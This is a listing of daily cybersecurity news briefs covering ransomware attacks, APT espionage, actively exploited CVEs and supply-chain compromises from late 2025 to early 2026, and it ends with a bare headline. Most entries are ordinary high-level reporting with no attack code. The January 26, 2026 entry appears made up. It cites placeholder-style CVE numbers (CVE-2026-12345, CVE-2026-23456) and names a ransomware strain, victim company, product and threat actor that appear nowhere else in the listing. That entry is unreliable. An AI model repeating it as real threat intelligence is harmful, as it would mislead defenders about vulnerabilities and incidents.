The Qilin ransomware group has claimed responsibility for a devastating cyberattack against Asahi Group Holdings, one of Japan's largest beverage companies. The attack, which occurred in late September, forced the company to halt production at 30 factories and suspend shipments, leading to significant operational and financial disruption. The threat actors are now reportedly demanding a $10 million ransom to prevent the public release of exfiltrated company data, employing a classic double extortion tactic. The incident highlights the increasing trend of ransomware gangs targeting the manufacturing sector to maximize impact and pressure victims into paying large ransoms.

Oct 6, 2025 (5 min read)

Phishing Campaign Abuses NPM and UNPKG CDN to Steal Credentials

A sophisticated phishing campaign, dubbed "Beamglea," is abusing the public NPM registry and the trusted unpkg.com CDN to host and deliver credential-stealing malware. Researchers at Socket discovered over 175 malicious, disposable NPM packages created solely to serve a malicious JavaScript file. Attackers send HTML lures to victims that load the script from the reputable unpkg.com domain, bypassing traditional domain-based security filters. This technique, which has targeted over 135 organizations in Europe, represents a dangerous evolution in supply chain abuse, turning developer infrastructure into a tool for direct phishing attacks.

Oct 6, 2025 (4 min read)

G7 Cyber Experts Issue Statement on Managing AI Risks in Financial Sector

The G7 Cyber Expert Group (CEG) has issued a formal statement on the cybersecurity implications of Artificial Intelligence (AI) within the financial sector. Released on October 6, 2025, the document highlights the dual nature of AI, acknowledging its potential to bolster cyber defenses while also warning that it can amplify existing threats and introduce new vulnerabilities. The G7 CEG urges financial institutions and regulators to proactively develop robust governance and risk management frameworks to ensure the secure and resilient adoption of AI, promoting collaboration to establish global best practices.

Oct 6, 2025 (4 min read)

"Maverick": New Banking Trojan Spreads via WhatsApp in Brazil

A new and sophisticated fileless banking Trojan named "Maverick" is spreading rapidly in Brazil through a large-scale WhatsApp campaign. According to Kaspersky researchers, the malware is delivered via ZIP archives containing malicious LNK files, a method that bypasses the platform's file-blocking. Maverick operates entirely in memory to evade detection, using PowerShell and encrypted shellcode to steal credentials for 26 Brazilian banks and multiple cryptocurrency exchanges. The Trojan also features a worm-like self-propagation mechanism, hijacking the victim's WhatsApp Web session to automatically send the malicious payload to all their contacts.

Oct 6, 2025 (5 min read)

Intelligence Publications

CISA Mandates Edge Device Purge Amid Wave of Zero-Day Exploits and Sophisticated Supply Chain Attacks

This cybersecurity brief for February 9, 2026, covers a critical period marked by aggressive state-sponsored attacks and widespread vulnerabilities. Key developments include a CISA directive forcing federal agencies to remove unsupported edge devices, the rapid exploitation of a Microsoft Office zero-day by Russia's APT28, and a sophisticated supply chain attack on Notepad++ attributed to a Chinese APT. Further incidents include a crippling ransomware attack on the BridgePay payment gateway and the discovery of critical zero-days in Ivanti and BeyondTrust products, highlighting urgent risks across government, finance, and technology sectors.

Feb 8, 2026 (8 articles)

CISA Warns of Actively Exploited SmarterMail RCE Flaw; BridgePay Payment Gateway Crippled by Ransomware

A critical, actively exploited RCE vulnerability (CVE-2026-24423) in SmarterMail has been added to CISA's KEV catalog, fueling ransomware attacks. Concurrently, a major ransomware incident has crippled the BridgePay payment gateway, causing nationwide outages for merchants. Other significant developments in the past 24 hours include CISA mandating the removal of unsupported edge devices from federal networks, attribution of a Notepad++ supply chain attack to a Chinese APT, and the discovery of a new EDR-killing malware that abuses a decade-old driver.

Feb 7, 2026 (7 articles)

CISA Warns of Actively Exploited SmarterMail RCE; Asian APT Hits 70 Orgs; 'Shai-Hulud' Worm Automates Supply Chain Attacks

This cybersecurity brief for February 7, 2026, covers multiple critical threats. CISA has added a SmarterMail RCE vulnerability (CVE-2026-24423) to its KEV catalog due to active exploitation in ransomware attacks. A massive year-long cyber-espionage campaign by an Asian APT group, TGR-STA-1030, has compromised at least 70 government and critical infrastructure organizations across 37 nations. Additionally, a new self-propagating worm, 'Shai-Hulud,' is automating software supply chain attacks by stealing developer credentials to infect npm packages. Other major developments include CISA's new directive to remove unsupported edge devices from federal networks and the discovery of new malware strains like Odyssey Stealer, Milkyway Ransomware, and the covert Pulsar RAT.

Feb 6, 2026 (7 articles)

Global Espionage 'Shadow Campaign' Breaches 37 Nations; CISA Warns of Actively Exploited Flaws in SmarterMail and VMware

This week in cybersecurity, a massive state-aligned espionage operation dubbed the 'Shadow Campaign' was uncovered, having compromised government and critical infrastructure entities in 37 countries. Meanwhile, CISA issued urgent warnings about actively exploited vulnerabilities in SmarterMail and VMware ESXi, both being used in ransomware attacks. Major data breaches also came to light, with an unsecured server exposing 8.7 billion records on Chinese citizens and social engineering attacks hitting investment platform Betterment and newsletter service Substack, affecting millions of users. In policy news, CISA mandated the removal of all unsupported edge devices from federal networks to combat nation-state threats.

Feb 5, 2026 (8 articles)

APT28 Exploits Office Zero-Day in Hours; Critical N8N Flaw Exposes 100K Servers; ShinyHunters Breaches Harvard

In the period of February 4-5, 2026, the cybersecurity landscape was dominated by rapid state-sponsored exploitation and critical vulnerability disclosures. The Russian APT28 group weaponized a Microsoft Office zero-day (CVE-2026-21509) within 24 hours to target European governments. Concurrently, a CVSS 10.0 RCE flaw (CVE-2026-21858) in the N8N automation platform left over 100,000 servers vulnerable to takeover. Adding to the incidents, the ShinyHunters collective claimed a major data breach at Harvard University, exposing 115,000 donor records through a sophisticated vishing campaign. Other significant events include patches from Cisco and F5, and CISA adding a SolarWinds flaw to its KEV catalog.

Feb 4, 2026 (8 articles)

Russian APT Exploits Patched Office Flaw in Days; Chinese Spies Hijack Notepad++ Updates

The cybersecurity landscape on February 4th, 2026, is dominated by sophisticated state-sponsored attacks. The Russian APT28 group was caught weaponizing a freshly patched Microsoft Office zero-day vulnerability (CVE-2026-21509) within days, targeting European entities. In a separate, long-running campaign, a Chinese APT compromised the Notepad++ update mechanism in a six-month supply chain attack. Other major incidents include the resurfacing of a massive AT&T customer dataset with 176 million records, a widespread DDoS campaign by pro-Russian hacktivists, and critical vulnerability disclosures for Django and Ingress-NGINX.

Feb 3, 2026 (9 articles)

Notepad++ Supply Chain Attack by Chinese APT; Russian Group Exploits Office Zero-Day

A sophisticated supply chain attack targeting the popular Notepad++ editor, attributed to the Chinese APT group Lotus Blossom, has been uncovered, selectively deploying malware to users in Southeast Asia. Concurrently, the Russian-backed APT28 is actively exploiting a new Microsoft Office zero-day vulnerability (CVE-2026-21509) to target entities in Eastern Europe. Ransomware remains a dominant threat, with the Qilin group claiming an attack on Tulsa International Airport and other groups targeting US law firms and manufacturing. These events highlight a landscape of escalating state-sponsored espionage and persistent criminal activity targeting critical infrastructure and corporate entities.

Feb 2, 2026 (11 articles)

Russian Hackers Target Polish Grid, Multiple Supply Chain Attacks, and Two Critical Zero-Days Under Active Exploitation

This edition covers a series of high-impact cybersecurity events for February 2nd, 2026. Key developments include a destructive but failed wiper attack on Poland's energy sector by the Russian-linked Sandworm group. The software supply chain remains a primary target, with attacks compromising both eScan antivirus update servers and the Open VSX marketplace. Concurrently, Microsoft and Fortinet are racing to patch critical, actively exploited zero-day vulnerabilities in Office and FortiGate firewalls, respectively. Other major stories include the rise of AI-assisted malware and phishing, a new stealthy RAT, and a significant data breach at an AI social network.

Feb 1, 2026 (9 articles)

Ivanti Zero-Days Under Active Attack as Polish Energy Grid Hit by Destructive Wiper Malware

This edition covers the critical cybersecurity landscape for February 1, 2026. Dominating the headlines are two actively exploited zero-day vulnerabilities in Ivanti's EPMM, prompting an emergency CISA directive. Simultaneously, a sophisticated wiper malware attack, potentially linked to Russian state-actors like Sandworm, targeted over 30 energy facilities in Poland, aiming to disrupt critical infrastructure. Other major events include an FBI takedown of the RAMP ransomware forum, a supply chain attack compromising eScan antivirus, and an advanced vishing campaign mimicking ShinyHunters to breach SaaS platforms. These incidents highlight escalating threats against enterprise software, critical infrastructure, and the software supply chain.

Jan 31, 2026 (9 articles)

Active Exploits Target Ivanti & Microsoft Office; Sandworm Deploys New Wiper in Poland

This cybersecurity brief for January 30, 2026, covers multiple critical threats, including actively exploited zero-day vulnerabilities in Ivanti EPMM and Microsoft Office, both requiring immediate patching. A sophisticated phishing campaign linked to the ShinyHunters alliance is targeting Okta SSO credentials at over 100 enterprises using voice phishing. Concurrently, the Sandworm threat actor has deployed a new destructive wiper, DynoWiper, against the Polish energy sector. Other major developments include a surge in DDoS attacks from new botnets, the discovery of the Sicarii ransomware operation, and a report detailing over 450,000 malicious open-source packages published in 2025.

Jan 29, 2026 (6 articles)

Actively Exploited Zero-Days in Microsoft Office & Fortinet; Major Brands Hit by Cyberattacks

This 24-hour period saw critical cybersecurity developments, including the active exploitation of zero-day vulnerabilities in Microsoft Office (CVE-2026-21509) and Fortinet's FortiCloud SSO (CVE-2026-24858), both added to CISA's KEV list. A wave of social engineering attacks impacted major brands like Bumble, Match, Panera, and Crunchbase, attributed to the 'ShinyHunters' group. Additionally, significant data breaches were reported at SoundCloud, affecting 29.8 million users, and the Illinois Department of Human Services, exposing data of 700,000 individuals. Research reports from Check Point and Sonatype highlight the increasing use of AI by attackers and a 75% surge in open-source malware, underscoring the escalating complexity of the threat landscape.

Jan 28, 2026 (8 articles)

Microsoft and Fortinet Race to Patch Actively Exploited Zero-Days as ShinyHunters Claims Massive Match Group Breach

This 24-hour period saw urgent, out-of-band patches from major vendors to combat actively exploited zero-day vulnerabilities. Microsoft issued an emergency fix for a critical Office security bypass (CVE-2026-21509), while Fortinet scrambled to address a critical SSO authentication bypass (CVE-2026-24858), both of which were added to CISA's KEV catalog. In the data breach landscape, the ShinyHunters group claimed a massive breach of Match Group, allegedly compromising 10 million user records from Hinge and OkCupid. Additionally, SolarWinds disclosed five critical RCE and auth bypass flaws in its Web Help Desk, and the Illinois Department of Human Services confirmed a breach affecting 700,000 individuals.

Jan 27, 2026 (10 articles)

Microsoft Patches Actively Exploited Office Zero-Day as Ransomware Groups Target Major Supply Chains

This cybersecurity brief for January 27, 2026, covers multiple critical incidents, led by an emergency out-of-band patch from Microsoft for an actively exploited zero-day (CVE-2026-21509) in Office, prompting a CISA directive. Concurrently, the RansomHub group has claimed a major attack on Apple supplier Luxshare, and the fallout from a previous breach at Under Armour sees 72 million customer records leaked. Other significant events include a critical RCE flaw patched in Zoom, active exploitation of a Fortinet SSO bypass, and the EU's proposal for a revised Cybersecurity Act to counter supply chain threats.

Jan 26, 2026 (8 articles)

QuantumLeap Ransomware Halts Global Logistics; Critical Zero-Days in NexusFlow and Mobile OSes Actively Exploited

A tumultuous day in cybersecurity for January 26, 2026, is marked by high-impact ransomware, critical zero-day vulnerabilities, and sophisticated nation-state espionage. The newly identified QuantumLeap ransomware has crippled logistics giant NaviGistics, demanding a $50 million ransom. Concurrently, a wormable RCE zero-day (CVE-2026-12345) in the NexusFlow API Gateway and a zero-click flaw (CVE-2026-23456) in iOS and Android are under active attack. Other major incidents include a supply chain attack on a popular NPM package, an AI-powered phishing campaign bypassing MFA, and continued espionage from threat actors like Volt Typhoon and SteelHydra targeting critical infrastructure and renewable energy sectors.

Jan 25, 2026 (11 articles)

Massive 149M Credential Leak, Sandworm's 'DynoWiper' Targets Poland, and FortiGate Firewalls Breached Despite Patches

This cybersecurity brief for January 25, 2026, covers a series of critical incidents. A massive 149 million credential leak has exposed users of Gmail, Facebook, and financial services. The Russian state-sponsored group Sandworm deployed a new 'DynoWiper' malware in an attack on Poland's power grid. Fully patched FortiGate firewalls are being compromised via a new SSO bypass. Other major events include data breach claims against Nike and Under Armour, a critical 11-year-old Telnet vulnerability, and multiple patch-related issues from Microsoft causing boot failures and application freezes.

Jan 24, 2026 (9 articles)

Critical 11-Year-Old Telnet Flaw Under Active Exploit; Pwn2Own Exposes Major Automotive Zero-Days

This cybersecurity brief for January 24, 2026, covers several critical developments. A severe 11-year-old vulnerability in GNU's telnetd service (CVE-2026-24061) is now under active exploitation, granting attackers root access. The Pwn2Own Automotive event saw researchers earn over $1 million for 76 zero-days, including 37 against Tesla. Meanwhile, CISA added four new flaws to its KEV catalog, the DragonForce ransomware group targeted a U.S. bank, and Microsoft issued emergency patches to fix recent update issues. Phishing campaigns targeting LastPass users and leveraging LinkedIn for RAT distribution are also on the rise.

Jan 23, 2026 (5 articles)

CISA Warns of Actively Exploited Flaws; North Korean Hackers Target Developers; Ransomware Hits Apple Supplier

This week in cybersecurity, CISA added four actively exploited vulnerabilities to its KEV catalog, demanding urgent patching from federal agencies. North Korean threat actors launched the 'Contagious Interview' campaign, using malicious VS Code projects to backdoor developers' systems. In the supply chain, a major Apple partner, Luxshare, was breached by the RansomHub group, leaking sensitive product designs. Meanwhile, new ransomware strains like Osiris and Anubis emerged with advanced TTPs, including data-wiping capabilities, and Oracle released a massive patch update fixing 337 vulnerabilities, one with a perfect 10.0 CVSS score.

Jan 22, 2026 (9 articles)

Cisco Zero-Day Under Active Attack as Oracle Drops Massive 337-Flaw Patch Update and Everest Ransomware Hits Major Brands

The cybersecurity landscape for January 22, 2026, is dominated by critical vulnerabilities and high-profile cyberattacks. Cisco is racing to patch an actively exploited zero-day RCE flaw (CVE-2026-20045) in its communications products, which CISA has added to its KEV catalog. Oracle released a massive January Critical Patch Update addressing 337 flaws, over 235 of which are remotely exploitable. Meanwhile, the Everest ransomware group has been highly active, claiming major data breaches at Under Armour and McDonald's India, threatening to leak data for millions of customers. Other significant events include critical patches from Zoom and GitLab, and reports highlighting the growing risks of supply chain attacks through both SaaS platforms and misconfigured security training applications.

Jan 21, 2026 (12 articles)

EU Proposes Ban on High-Risk Tech, AI-Generated Malware Emerges, and Ransomware Hits Apple Supplier Luxshare

This cybersecurity brief for January 21, 2026, covers significant global developments. The EU has proposed a revised Cybersecurity Act to ban high-risk tech suppliers from critical sectors, a move largely targeting Chinese firms. In threat intelligence, researchers have detailed 'VoidLink,' a sophisticated Linux malware framework believed to be one of the first advanced threats predominantly built with AI assistance. Meanwhile, the RansomHub group claims a major breach against Apple supplier Luxshare, threatening to leak sensitive R&D data, and Oracle has released a critical patch for a CVSS 10.0 vulnerability in WebLogic Server.

Jan 20, 2026 (6 articles)

Ingram Micro Breach Exposes 42k; UK Warns of Pro-Russia DDoS; New Ransomware Threats Emerge

In the last 24 hours, the cybersecurity landscape has been dominated by major data breach disclosures, state-sponsored threat alerts, and the evolution of the ransomware ecosystem. IT distributor Ingram Micro confirmed a ransomware attack from mid-2025 impacted over 42,000 individuals, exposing sensitive PII. Simultaneously, the UK's NCSC issued a formal warning about persistent DDoS attacks from Russian-aligned hacktivists targeting critical infrastructure. New malware campaigns like 'PDFSIDER' and 'Evelyn Stealer' showcase increasingly sophisticated evasion techniques, while emerging threat groups like DragonForce signal a consolidation in the RaaS market.

Jan 19, 2026 (9 articles)

Google Gemini Flaw Exposes Calendar Data; Black Basta Ransomware Leader on EU's Most Wanted

This cybersecurity advisory for January 19, 2026, covers a significant increase in sophisticated attacks. Key developments include a novel prompt injection vulnerability in Google Gemini allowing calendar data theft, an international manhunt for the leader of the Black Basta ransomware group, and a surge in cloud and supply chain attacks. Other critical stories include the discovery of Evelyn Stealer malware targeting developers via VS Code extensions, critical vulnerabilities in TP-Link cameras and various business software with public exploits, and a doubling of data breaches in the healthcare sector.

Jan 18, 2026 (12 articles)

Palo Alto Networks Patches Critical Firewall Flaw; Microsoft Dismantles RedVDS Cybercrime Service

In the last 24 hours, the cybersecurity landscape has been marked by significant defensive actions and disclosures. Palo Alto Networks released urgent patches for a high-severity denial-of-service vulnerability (CVE-2026-0227) affecting its firewalls, allowing attackers to remotely disable network protection. In a major blow to cybercrime infrastructure, Microsoft and global law enforcement agencies successfully dismantled the RedVDS 'Cybercrime-as-a-Service' platform, which was responsible for over $40 million in fraud. Concurrently, the NSA published new foundational guidelines for Zero Trust adoption, aiming to bolster national cybersecurity posture. Other key developments include strategic product launches and acquisitions from Infoblox, SpyCloud, and Acronis, all focused on enhancing threat visibility and response capabilities.

Jan 16, 2026 (11 articles)

AWS CodeBreach Exposes Massive Supply Chain Risk; Ransomware Attacks Hit Record Highs in 2025

This cybersecurity publication for January 16, 2026, covers a series of critical developments, led by the disclosure of the 'CodeBreach' vulnerability in AWS CodeBuild, which posed a severe supply chain threat to countless applications. Concurrently, new reports confirm that 2025 was a record-breaking year for ransomware, with a 58% surge in attacks. Other major incidents include the Everest ransomware group's claimed breach of Nissan, active exploitation of a critical WordPress plugin flaw, and the discovery of sophisticated malware frameworks like VoidLink targeting cloud environments and GlassWorm targeting macOS developers.

Jan 15, 2026 (6 articles)

Microsoft Patches Actively Exploited Zero-Day; Massive Data Breaches Impact Millions in France and US Healthcare

In the period ending January 15, 2026, the cybersecurity landscape was dominated by Microsoft's January Patch Tuesday, which addressed an actively exploited zero-day (CVE-2026-20805). Concurrently, several massive data breaches came to light, including a leak exposing the records of 45 million French citizens and significant intrusions at healthcare and educational institutions in the US and New Zealand. New threats also emerged, with reports on the industrialization of npm supply chain attacks and the discovery of VoidLink, a sophisticated Linux malware framework targeting cloud environments.

Jan 14, 2026 (4 articles)

CISA Mandates Patches for Exploited Windows & Gogs Zero-Days; Ransomware Cripples Hospital & Energy Giant Breached

In the last 24 hours, the cybersecurity landscape has been dominated by critical vulnerability disclosures and high-impact cyberattacks. The U.S. CISA has added two actively exploited zero-day vulnerabilities to its KEV catalog: a Windows information disclosure flaw (CVE-2026-20805) and a Gogs RCE flaw (CVE-2025-8110), mandating urgent action from federal agencies. In Europe, a suspected ransomware attack crippled Belgium's AZ Monica hospital, forcing the transfer of critical patients, while Spanish energy giant Endesa confirmed a massive data breach with a threat actor claiming to hold data on 20 million people. These incidents are compounded by new threat intelligence on evolving tactics from Russian GRU hackers and a strategic shift in the ransomware ecosystem towards encryptionless extortion.

Jan 13, 2026 (9 articles)

CISA KEV Alert for Gogs RCE Flaw; BreachForums Database Leaked; AI Threats Forecasted to Rise

This cybersecurity brief for January 13, 2026, covers several major incidents. CISA has added a critical, actively exploited Gogs vulnerability (CVE-2025-8110) to its KEV catalog, demanding urgent patching. In a significant blow to the cybercrime ecosystem, the user database of the notorious BreachForums was leaked, exposing nearly 324,000 members. Additionally, telecom provider Brightspeed is investigating a major breach claim, while reports from Experian and Everstream Analytics forecast a surge in AI-driven attacks and cyber threats against the global supply chain. Other key events include a critical 10.0 CVSS vulnerability in the n8n automation platform and a new roadmap from the G7 for post-quantum cryptography in the financial sector.

Jan 12, 2026 (4 articles)

CrazyHunter Ransomware Hits Taiwanese Healthcare, G7 Warns on Quantum Threats, and Malicious npm Packages Target n8n

A cybersecurity summary for January 12, 2026, covering a surge in targeted attacks and strategic warnings. Highlights include the 'CrazyHunter' ransomware crippling Taiwanese healthcare with advanced tactics, a G7 directive urging the financial sector to prepare for post-quantum cryptography, and a new supply chain attack using malicious npm packages to steal credentials from the n8n automation platform. Other major events include a massive DDoS campaign against the UK by pro-Russian hacktivists and a WEF report identifying cyber-fraud as the new top global threat.

Jan 11, 2026 (5 articles)

Instagram Denies Breach Amid Data Leak Panic; Ransomware Hits French and Japanese Giants

This cybersecurity brief for January 11, 2026, covers a tumultuous period marked by a major data leak scare at Instagram affecting 17.5 million users, which the company attributes to a bug rather than a breach. Meanwhile, ransomware groups continue their assault on major corporations, with the Qilin group targeting French infrastructure firm Bouygues and the Everest group claiming a massive 900 GB data theft from Nissan. Nation-state activity also remains high, as Iran-linked MuddyWater deploys a new 'RustyWater' RAT in the Middle East, and Chinese APT 'Salt Typhoon' is linked to a hack of U.S. Congressional staff emails. Other significant events include a healthcare data breach in New Zealand, a novel 'quishing' scam in France, and a critical vulnerability disclosed in the Mailpit developer tool.

Jan 10, 2026 (9 articles)

Chinese Hackers Caught Exploiting VMware Zero-Days for Over a Year; FBI Warns of North Korean 'Quishing' Attacks

This cybersecurity brief for January 10, 2026, covers several critical developments. A sophisticated Chinese-linked threat actor was discovered exploiting a trio of VMware ESXi zero-days for more than a year before they were patched, enabling full VM escapes. The FBI has issued a warning about the North Korean Kimsuky APT using QR code phishing ('quishing') to bypass email security and steal credentials. Additionally, major data breaches have been disclosed by the Illinois Department of Human Services, affecting 700,000 residents, and online gambling firm BetVictor. CISA has also added a critical, actively exploited HPE OneView vulnerability to its KEV catalog, mandating urgent patching.

Jan 9, 2026 (8 articles)

Critical 'Ni8mare' Flaw Hits n8n; Chinese Hackers Wielded VMware Zero-Day for a Year

This cybersecurity brief for January 9, 2026, covers a critical unauthenticated RCE vulnerability (CVSS 10.0) in the n8n platform, revelations that a Chinese state-sponsored actor possessed a VMware ESXi zero-day exploit for over a year before its disclosure, and an FBI warning about North Korean 'quishing' campaigns. Other major events include data breaches affecting London councils and New Zealand's largest patient portal, new malware strains like Ripper Ransomware, and CISA adding actively exploited flaws in HPE and legacy PowerPoint to its KEV catalog.

Jan 8, 2026 (9 articles)

Critical RCE Flaws in n8n and D-Link Routers Under Active Exploitation; CISA Issues Urgent Warnings

This cybersecurity brief for January 8, 2026, covers a series of critical vulnerabilities and active threats. Headlining the news are two maximum-severity (CVSS 10.0) remote code execution flaws in the n8n workflow automation platform, one unauthenticated and one authenticated, prompting urgent patching. Concurrently, a zero-day RCE is being actively exploited in end-of-life D-Link routers, with no patch forthcoming. CISA has added exploited flaws in HPE OneView and legacy PowerPoint to its KEV catalog. Major incidents include a data breach claim against broadband provider Brightspeed by the Crimson Collective, a ransomware attack on claims giant Sedgwick by TridentLocker, and a large-scale SEO poisoning campaign by the Black Cat group. Additionally, reports highlight novel phishing tactics abusing Microsoft 365 and Google Cloud services, and malicious Chrome extensions stealing AI chat data from nearly a million users.

Jan 7, 2026 (5 articles)

Critical RCEs in n8n, Microsoft Warns of Phishing Surge, and Lapsus$ Group Resurfaces

This cybersecurity publication for January 7, 2026, covers a series of critical threats and developments. Highlights include the disclosure of two maximum-severity unauthenticated and authenticated RCE vulnerabilities (CVSS 10.0) in the n8n automation platform, a major warning from Microsoft about a surge in phishing attacks exploiting email routing and DNS misconfigurations, and intelligence suggesting the Lapsus$ extortion group has resurfaced with evolved tactics. Other key stories include the 'Zestix' actor breaching 50 companies via stolen credentials on MFA-less portals, a ransomware attack on claims giant Sedgwick by the TridentLocker group, and significant updates to US data privacy laws and UK government cyber strategy.

Jan 6, 2026 (9 articles)

Ransomware & Supply Chain Attacks Proliferate as TridentLocker Hits Gov't Contractor and Cl0p Breaches Korean Air

This cybersecurity brief for January 6, 2026, covers a surge in high-impact incidents. Key events include a confirmed ransomware attack on a Sedgwick government subsidiary by the new TridentLocker group and a major supply chain breach at Korean Air via a vendor, attributed to Cl0p. Additionally, the Kimwolf botnet has infected over two million Android devices, Microsoft warns of phishing attacks exploiting email routing flaws, and new state-level privacy laws have taken effect across the U.S., increasing compliance burdens.

Jan 5, 2026 (5 articles)

Ransomware Supply Chain Attacks Surge; Critical Flaws in Medical and IoT Devices Exposed

This cybersecurity brief for January 5, 2026, covers a wave of high-impact supply chain attacks, with ransomware groups like TridentLocker and Cl0p breaching major federal and corporate vendors. A massive data breach at 700Credit exposed 5.6 million consumer records, while critical vulnerabilities were disclosed in WHILL power wheelchairs and popular headphone brands, posing both physical and digital risks. Additionally, the RondoDox botnet is actively exploiting a CVSS 10.0 flaw in web frameworks.

Jan 4, 2026 (3 articles)

China's Cyber War on Taiwan Intensifies; Critical Flaws in IoT and Enterprise Software Actively Exploited

A cybersecurity report for January 4, 2026, reveals a significant escalation in state-sponsored cyberattacks, with a Taiwanese government report detailing over 2.6 million daily attacks from China in 2025. Concurrently, critical vulnerabilities are under active exploitation, including a memory disclosure flaw in MongoDB ('Mongobleed') added to CISA's KEV list, and a zero-day in Oracle E-Business Suite leveraged by the Clop group. The IoT landscape is also under fire, with critical remote hijacking flaws discovered in WHILL electric wheelchairs and Petlibro smart feeders, highlighting severe physical and privacy risks. Major data breaches continue to have fallout, with 700Credit exposing 5.6 million consumer records via API abuse and Cognizant facing lawsuits over its TriZetto healthcare data breach.

Jan 3, 2026 (7 articles)

Iranian-Linked Hackers Dox Israeli Intel Agents; Critical Flaws in Fortinet & Next.js Actively Exploited

This cybersecurity brief for January 3, 2026, covers several critical developments. The Iran-linked Handala group has escalated its psychological warfare campaign by doxing Israeli SIGINT officers, primarily through Telegram account compromises. Meanwhile, critical, actively exploited vulnerabilities in Fortinet firewalls (CVE-2020-12812) and Next.js (CVE-2025-55182) are being leveraged by threat actors for 2FA bypass and botnet creation, respectively. Other major incidents include a massive data breach claim against Tokyo FM radio, the rise of the VVS Stealer malware, and a widespread phishing campaign abusing Google Tasks.

Jan 2, 2026 (8 articles)

Critical Flaws, Ransomware Breaches, and Supply Chain Attacks Dominate Early 2026

The cybersecurity landscape for January 2, 2026, is marked by a series of high-impact incidents, including multiple critical vulnerabilities with CVSS scores of 9.8 and 10.0 being actively exploited or posing severe risks. Major data breaches in the healthcare sector, attributed to ransomware gangs like Qilin, have exposed the sensitive information of hundreds of thousands of individuals. Concurrently, sophisticated supply chain attacks continue to prove effective, with a crypto wallet losing millions and Apple's manufacturing partners facing threats. Phishing campaigns also evolved, abusing legitimate cloud services to bypass traditional defenses.

Jan 1, 2026 (3 articles)

Iranian APTs Evolve with Telegram C2, Ransomware Industrializes, and Critical Flaws Threaten Global Servers to Kick Off 2026

This cybersecurity brief for January 1, 2026, covers a significant escalation in threat actor sophistication and critical infrastructure risks. Key developments include the Iranian APT 'Prince of Persia' adopting Telegram for command-and-control, the industrialization of Ransomware-as-a-Service (RaaS) into cartel-like operations, and the active exploitation of critical vulnerabilities like 'MongoBleed' (CVE-2025-14847) in MongoDB and 'React2Shell' (CVE-2025-55182) in Next.js servers. State-sponsored groups from China (Mustang Panda) and South America (BlindEagle) have also deployed advanced stealth techniques, while major data breaches at organizations like the University of Phoenix highlight the severe impact of these evolving threats.

Dec 31, 2025 (3 articles)

Critical Flaws in MongoDB & Medical Devices, alongside Major Supply Chain Breaches at Trust Wallet and Korean Air

This cybersecurity brief for December 31, 2025, covers a series of high-impact events, including the discovery of critical vulnerabilities in widely used technologies and significant data breaches stemming from supply chain compromises. Key incidents include 'MongoBleed,' a critical memory disclosure flaw in MongoDB, and a remote-hijacking vulnerability in WHILL electric wheelchairs. Supply chain attacks resulted in an $8.5 million theft from Trust Wallet users and the exposure of 30,000 Korean Air employee records. Additionally, a new malicious AI tool, 'DIG AI,' has emerged on the dark web, designed to automate cybercrime, and former cybersecurity professionals have pleaded guilty to conducting ransomware attacks, highlighting a severe insider threat.

Dec 30, 2025 (6 articles)

CISA Orders Emergency Patch for Actively Exploited 'MongoBleed' Flaw as Insider Threats and Supply Chain Attacks Rattle Industries

This cybersecurity brief for December 30, 2025, covers a series of critical incidents. The most prominent is the active exploitation of 'MongoBleed' (CVE-2025-14847), a severe memory leak vulnerability in MongoDB, which prompted an emergency directive from CISA. Other major events include the disclosure of a 10.0 CVSS RCE flaw in SmarterMail (CVE-2025-52691), the guilty pleas of two cybersecurity insiders who deployed ALPHV/BlackCat ransomware, and a massive data breach at the University of Phoenix affecting nearly 3.5 million individuals due to a Clop ransomware attack exploiting an Oracle zero-day. These events highlight escalating threats from unpatched vulnerabilities, insider risks, and sophisticated ransomware operations.

Dec 29, 2025 (7 articles)

CISA Warns of Actively Exploited 'MongoBleed' Flaw; Supply Chain Attacks Double in 2025 Amid Holiday Ransomware Surge

This cybersecurity brief for December 28-29, 2025, covers several critical developments. CISA has issued an urgent warning about the 'MongoBleed' (CVE-2025-14847) vulnerability in MongoDB, now under active exploitation. Supply chain attacks continue to escalate, with Korean Air suffering a breach via a subsidiary, attributed to the Clop ransomware group exploiting an Oracle zero-day. A year-end report confirms that software supply chain attacks more than doubled in 2025. Ransomware groups, including Qilin and Medusa, capitalized on the holiday period to launch a wave of attacks, while malicious Chrome extensions were found to have stolen AI chat data from nearly a million users. Finally, Microsoft and Adobe released their last patches of the year, fixing over 190 vulnerabilities, including an actively exploited Windows zero-day.

Dec 28, 2025 (7 articles)

Critical Flaws "MongoBleed" and "React2Shell" Actively Exploited, Major Data Breaches and Ransomware Attacks Continue Year-End Surge

This cybersecurity advisory for December 28, 2025, covers a series of critical threats, including the active exploitation of the "MongoBleed" (CVE-2025-14847) memory leak in MongoDB and the "React2Shell" (CVE-2025-55182) RCE vulnerability in the React framework. The period also saw major data breach disclosures from 700Credit and Baker University, affecting millions. Ransomware activity remains high, with attacks on Romanian critical infrastructure by "The Gentlemen" and a claimed breach of Chrysler by the Everest group. State-sponsored activity also features prominently with updated advisories on the BRICKSTORM backdoor and the re-emergence of Iran's "Prince of Persia" APT.

Dec 27, 2025 (5 articles)

MongoBleed Exploit Unleashed, React2Shell Deadline Passes Amid Active Attacks, and Ransomware Strikes European Critical Infrastructure

In the period of December 26-27, 2025, the cybersecurity landscape was dominated by the release of a public exploit for the critical 'MongoBleed' vulnerability (CVE-2025-14847), triggering widespread scanning and placing tens of thousands of MongoDB databases at immediate risk. Concurrently, the CISA deadline passed for patching the 'React2Shell' flaw (CVE-2025-55182), which is already under active exploitation by state-sponsored actors. The holiday period saw targeted ransomware attacks, with the 'Gentlemen' group hitting a major Romanian energy producer and LockBit 5.0 claiming a breach of a Greek luxury hotel brand. Other significant events include the discovery of a critical RCE in the n8n automation platform, a supply chain attack on Trust Wallet leading to a $7 million theft, and a sophisticated DNS poisoning campaign by the China-linked 'Evasive Panda' APT.

Dec 26, 2025 (5 articles)

Holiday Havoc: 'MongoBleed' Exploit Unleashed, Chinese APTs Escalate Attacks, and Critical Infrastructure Hit by Ransomware

This cybersecurity brief for December 26, 2025, covers a series of critical holiday-timed incidents. A public exploit for 'MongoBleed' (CVE-2025-14847), a severe memory leak flaw in MongoDB, has been released and is under active attack. Multiple Chinese APT groups, including 'Evasive Panda', 'Silver Fox', and 'HoneyMyte', have launched sophisticated espionage campaigns using advanced techniques like DNS poisoning and kernel-mode rootkits. Concurrently, a ransomware attack by the 'Gentlemen' group struck a major Romanian energy producer, and CISA issued alerts for several critical vulnerabilities, underscoring a period of heightened threat activity.

Dec 25, 2025 (8 articles)

ServiceNow's $7.75B Armis Buy, Pro-Russian DDoS Attacks, and AI-Powered Scams Define Holiday News Cycle

